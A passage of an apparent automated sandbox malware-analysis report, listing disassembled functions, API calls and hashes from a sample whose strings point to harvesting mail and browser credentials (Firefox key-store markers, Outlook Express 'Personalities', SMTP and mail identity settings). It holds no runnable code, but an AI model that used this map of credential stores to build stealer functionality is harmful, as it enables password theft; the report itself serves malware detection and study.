                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                    • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                  • CloseHandle.KERNEL32(?), ref: 00444206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                  • String ID: ACD
                                                  • API String ID: 1886237854-620537770
                                                  • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                  • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                  Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004091EC
                                                  • sprintf.MSVCRT ref: 00409201
                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                  • String ID: caption$dialog_%d
                                                  • API String ID: 2923679083-4161923789
                                                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                  Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                  • memset.MSVCRT ref: 00410246
                                                  • memset.MSVCRT ref: 00410258
                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                  • memset.MSVCRT ref: 0041033F
                                                  • _mbscpy.MSVCRT ref: 00410364
                                                  • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 3974772901-0
                                                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                  Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcslen.MSVCRT ref: 0044406C
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                  • strlen.MSVCRT ref: 004440D1
                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                  • memcpy.MSVCRT ref: 004440EB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                  • String ID:
                                                  • API String ID: 577244452-0
                                                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                  Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C02D
                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 2726666094-3614832568
                                                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                  Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                  • String ID:
                                                  • API String ID: 2014771361-0
                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                  Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memcmp.MSVCRT ref: 00406151
                                                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                  • memcmp.MSVCRT ref: 0040617C
                                                  • memcmp.MSVCRT ref: 004061A4
                                                  • memcpy.MSVCRT ref: 004061C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID: global-salt$password-check
                                                  • API String ID: 231171946-3927197501
                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                  Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040644F
                                                  • memcpy.MSVCRT ref: 00406462
                                                  • memcpy.MSVCRT ref: 00406475
                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                  • memcpy.MSVCRT ref: 004064B9
                                                  • memcpy.MSVCRT ref: 004064CC
                                                  • memcpy.MSVCRT ref: 004064F9
                                                  • memcpy.MSVCRT ref: 0040650E
                                                    • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                  Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                  • memset.MSVCRT ref: 0040330B
                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                  • strchr.MSVCRT ref: 0040335A
                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                  • strlen.MSVCRT ref: 0040339C
                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                  • String ID: Personalities
                                                  • API String ID: 2103853322-4287407858
                                                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                  Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 004090C2
                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                  Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi$_mbscpy
                                                  • String ID: smtp
                                                  • API String ID: 2625860049-60245459
                                                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                  Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  • memset.MSVCRT ref: 00408258
                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                  Strings
                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Close$EnumOpenmemset
                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                  • API String ID: 2255314230-2212045309
                                                  • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                  • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                  Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C28C
                                                  • SetFocus.USER32(?,?), ref: 0040C314
                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FocusMessagePostmemset
                                                  • String ID: S_@$l
                                                  • API String ID: 3436799508-4018740455
                                                  • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                  • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                  Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004092C0
                                                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                  • _mbscpy.MSVCRT ref: 004092FC
                                                  Strings
                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString_mbscpymemset
                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                  • API String ID: 408644273-3424043681
                                                  • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                  • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                  • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                  • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                  Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 3492281209-168460110
                                                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                  Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClassName_strcmpimemset
                                                  • String ID: edit
                                                  • API String ID: 275601554-2167791130
                                                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                  Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                  • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                  Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                  Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  • API String ID: 3510742995-2766056989
                                                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                  Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi
                                                  • String ID: C@$mail.identity
                                                  • API String ID: 1439213657-721921413
                                                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                  Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                  • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                  Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _ultoasprintf
                                                  • String ID: %s %s %s
                                                  • API String ID: 432394123-3850900253
                                                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
